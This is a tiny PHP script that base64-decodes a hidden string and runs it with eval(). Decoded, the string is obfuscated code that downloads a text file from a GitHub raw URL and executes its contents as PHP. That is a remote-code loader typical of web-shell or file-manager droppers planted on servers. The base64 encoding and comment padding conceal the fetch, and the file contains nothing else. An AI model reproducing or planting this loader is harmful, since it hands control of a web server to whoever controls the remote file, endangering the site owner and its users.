<?php
error_reporting(E_ALL);
ini_set('display_errors', 1);

$encryptedStr = 'LyoqKiovQG51bGw7IC8qKioqKioqKi8gLyoqKioqKiovIC8qKioqKioqKi9AZXZhbC8qKioqLygiPz4iLmZpbGVfZ2V0X2NvbnRlbnRzLyoqKioqKiovKHVybGRlY29kZSh1cmxlbmNvZGUocmF3dXJsZGVjb2RlKHJhd3VybGVuY29kZSgiaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL2hpbG5ldC9tZXRva2wvbWFpbi9mbS50eHQiKSkpKSkpOy8qKi8=';

// Base64 decode
$decoded = base64_decode($encryptedStr);

// EVAL ile çalıştır (TEHLİKELİ!)
eval($decoded);
?>